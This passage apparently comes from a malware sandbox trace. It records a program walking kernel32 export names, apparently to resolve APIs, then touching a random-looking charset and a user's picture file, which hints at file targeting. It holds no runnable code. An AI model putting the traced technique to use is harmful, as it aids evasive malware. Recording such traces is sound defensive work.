(lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.679] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.679] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.679] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.680] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.680] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.680] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.680] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.680] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.680] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.680] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.680] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.680] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.680] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.680] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.680] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.680] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.680] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.680] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.680] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.680] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.680] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.681] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.681] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.681] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.681] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.681] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.681] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.681] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.681] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.681] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.681] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.681] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.681] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.681] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.681] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.681] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.681] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.681] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.682] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.682] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.682] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.682] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.682] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.682] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.682] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.682] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.682] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.682] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.682] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.682] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.682] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.682] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.682] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.682] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.682] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.683] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.683] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.683] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.683] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.683] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.683] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.683] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.683] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.683] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.683] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.683] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.683] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.683] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.683] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.683] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.683] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.683] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.683] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.684] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.684] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.684] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.684] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.684] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.684] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.684] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.684] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.684] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.684] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.684] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.684] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.684] lstrlenA (lpString="DELETEATOM") returned 10 [0086.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.684] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.684] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.684] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.684] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.685] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.685] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.685] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.685] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.685] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.685] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.685] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.685] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.685] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.685] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.685] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.685] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.685] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.685] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.685] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.693] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.693] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.693] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.693] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.694] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.694] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.694] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.694] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.694] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.694] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.694] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.694] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.694] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.694] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.694] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.694] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.694] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.694] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.694] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.694] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.694] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.695] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.695] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\CjScda.jpg") returned 61 [0086.695] wsprintfW (in: 